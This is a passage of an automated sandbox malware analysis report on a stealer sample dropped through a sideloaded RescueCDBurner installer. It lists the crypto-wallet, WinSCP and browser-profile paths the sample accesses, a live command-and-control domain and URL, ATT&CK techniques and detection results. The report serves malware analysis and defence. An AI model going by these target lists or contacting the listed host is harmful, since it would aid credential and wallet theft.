etlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_6D0B3340
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6C0D750C
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6C0D767A
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6C0D7270
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6C0D52E4
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C14F2EF
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C14F356
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6C0D73B4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FBB84 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,LocalFree,0_2_008FBB84
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A805 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,0_2_0093A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E9360 GetUserNameW,GetLastError,0_2_008E9360
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094BA41 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0094BA41
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0928F4 __EH_prolog3_GS,_memset,GetVersionExW,GetVersionExW,GetVersionExW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,2_2_6D0928F4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: wallets\Electrum
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb{
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: r\??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: r\??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: t\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-releaseJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Native API		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		12
System Time Discovery		Remote Services11
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Windows Service		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Credentials in Registry		1
Account Discovery		Remote Desktop Protocol21
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)1
Access Token Manipulation		4
Obfuscated Files or Information		Security Account Manager13
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Windows Service		1
Software Packing		NTDS147
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script213
Process Injection		11
DLL Side-Loading		LSA Secrets1
Query Registry		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials221
Security Software Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading		DCSync3
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Virtualization/Sandbox Evasion		Proc Filesystem11
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron213
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586711 Sample: kXzODlqJak.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 86 bamarelakij.site 2->86 112 Multi AV Scanner detection for submitted file 2->112 114 AI detected suspicious sample 2->114 13 kXzODlqJak.exe 8 2->13         started        16 RescueCDBurner.exe 1 2->16         started        19 msedge.exe 2->19         started        signatures3 process4 dnsIp5 84 C:\Windows\Temp\...\kXzODlqJak.exe, PE32 13->84 dropped 22 kXzODlqJak.exe 21 13->22         started        102 Maps a DLL or memory area into another process 16->102 26 cmd.exe 2 16->26         started        88 192.168.2.4 unknown unknown 19->88 90 192.168.2.8, 138, 443, 49703 unknown unknown 19->90 92 239.255.255.250 unknown Reserved 19->92 28 msedge.exe 19->28         started        31 msedge.exe 19->31         started        33 msedge.exe 19->33         started        35 msedge.exe 19->35         started        file6 signatures7 process8 dnsIp9 74 C:\Windows\Temp\...\RescueCDBurner.exe, PE32 22->74 dropped 76 C:\Windows\Temp\...\msvcr100.dll, PE32 22->76 dropped 78 C:\Windows\Temp\...\msvcp100.dll, PE32 22->78 dropped 82 6 other files (none is malicious) 22->82 dropped 132 Multi AV Scanner detection for dropped file 22->132 37 RescueCDBurner.exe 11 22->37         started        80 C:\Users\user\AppData\Local\Temp\morvrstbj, PE32+ 26->80 dropped 134 Writes to foreign memory regions 26->134 136 Maps a DLL or memory area into another process 26->136 41 LocalCtrl_alpha_v3.exe 26->41         started        43 conhost.exe 26->43         started        96 13.89.178.27, 443, 49874, 49912 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->96 98 131.253.33.203, 443, 49845, 49846 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->98 100 21 other IPs or domains 28->100 file10 signatures11 process12 file13 66 C:\Users\user\AppData\...\RescueCDBurner.exe, PE32 37->66 dropped 68 C:\Users\user\AppData\...\msvcr100.dll, PE32 37->68 dropped 70 C:\Users\user\AppData\...\msvcp100.dll, PE32 37->70 dropped 72 5 other files (none is malicious) 37->72 dropped 124 Switches to a custom stack to bypass stack traces 37->124 126 Found direct / indirect Syscall (likely to bypass EDR) 37->126 45 RescueCDBurner.exe 1 37->45         started        128 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->128 130 Tries to harvest and steal browser information (history, passwords, etc) 41->130 signatures14 process15 signatures16 138 Maps a DLL or memory area into another process 45->138 140 Switches to a custom stack to bypass stack traces 45->140 142 Found direct / indirect Syscall (likely to bypass EDR) 45->142 48 cmd.exe 5 45->48         started        process17 file18 62 C:\Users\user\...\LocalCtrl_alpha_v3.exe, PE32+ 48->62 dropped 64 C:\Users\user\AppData\Local\Temp\pfce, PE32+ 48->64 dropped 104 Writes to foreign memory regions 48->104 106 Found hidden mapped module (file has been removed from disk) 48->106 108 Maps a DLL or memory area into another process 48->108 110 Switches to a custom stack to bypass stack traces 48->110 52 LocalCtrl_alpha_v3.exe 48->52         started        56 conhost.exe 48->56         started        signatures19 process20 dnsIp21 94 bamarelakij.site 104.21.80.52, 443, 49712, 49714 CLOUDFLARENETUS United States 52->94 116 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->116 118 Found many strings related to Crypto-Wallets (likely being stolen) 52->118 120 Found strings related to Crypto-Mining 52->120 122 2 other signatures 52->122 58 msedge.exe 52->58         started        signatures22 process23 process24 60 msedge.exe 58->60         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
kXzODlqJak.exe45%ReversingLabsWin32.Trojan.Nekark

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe3%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe29%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://wixtoolset.org/schemas/v4/BundleExtensionData0%Avira URL Cloudsafe
http://wixtoolset.org/schemas/v4/2008/BurnHd0%Avira URL Cloudsafe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa0%Avira URL Cloudsafe
https://bamarelakij.site/roi0%Avira URL Cloudsafe
https://ntp.msn.comcache-control:public0%Avira URL Cloudsafe
https://bamarelakij.site/roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m0%Avira URL Cloudsafe
http://wixtoolset.org/schemas/v4/BootstrapperApplicationData0%Avira URL Cloudsafe
https://dns.levonet.sk/dns-query0%Avira URL Cloudsafe
https://ntp.msn.comcache-controlpublic0%Avira URL Cloudsafe
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()0%Avira URL Cloudsafe
http://wixtoolset.org/schemas/v4/2008/Burn0%Avira URL Cloudsafe
http://bugreports.qt-project.org/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
    		94.245.104.56
    		truefalse
      		high
      sb.scorecardresearch.com
      		18.244.18.32
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		142.250.185.161
        		truefalse
          		high
          bamarelakij.site
          		104.21.80.52
          		truefalse
            		high
            clients2.googleusercontent.com
            		unknown
            		unknownfalse
              		high
              bzib.nelreports.net
              		unknown
              		unknownfalse
                		high
                assets.msn.com
                		unknown
                		unknownfalse
                  		high
                  c.msn.com
                  		unknown
                  		unknownfalse
                    		high
                    ntp.msn.com
                    		unknown
                    		unknownfalse
                      		high
                      api.msn.com
                      		unknown
                      		unknownfalse
                        		high
                        assets2.msn.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://deff.nelreports.net/api/report?cat=msnfalse
                            		high
                            https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=truefalse
                              		high
                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946922&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                		high
                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945908&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                  		high
                                  https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=truefalse
                                    		high
                                    https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                      		high
                                      https://sb.scorecardresearch.com/b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                        		high
                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430943703&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                          		high
                                          https://c.msn.com/c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22false
                                            		high
                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945913&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_xRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                		high
                                                http://www.vmware.com/0RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dns10.quad9.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.reneelab.it/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      		high
                                                      https://dns11.quad9.net/dns-query%LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://xml.org/sax/features/namespace-prefixesRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                          		high
                                                          http://wixtoolset.org/schemas/v4/2008/BurnHdkXzODlqJak.exe, 00000002.00000002.1795762434.00000000057B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://wixtoolset.org/schemas/v4/BootstrapperApplicationDatakXzODlqJak.exe, 00000002.00000003.1492963333.0000000003340000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000003.1492931607.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.reneelab.biz/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            		high
                                                            https://bamarelakij.site/roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0mLocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://downloads.reneelab.com/download_api.phpRescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                              		high
                                                              http://bug.reneelab.comRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                		high
                                                                http://qt.digia.com/RescueCDBurner.exe, 00000004.00000002.1588722536.000000006B8DE000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                  		high
                                                                  http://www.reneelab.ru/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    		high
                                                                    https://dns11.quad9.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dns10.quad9.net/dns-query%LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://b.chenall.net/menu.lstRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                            		high
                                                                            http://www.softwareok.deRescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://grub4dos.chenall.net/e/%u)RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                		high
                                                                                http://www.reneelab.es/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                  		high
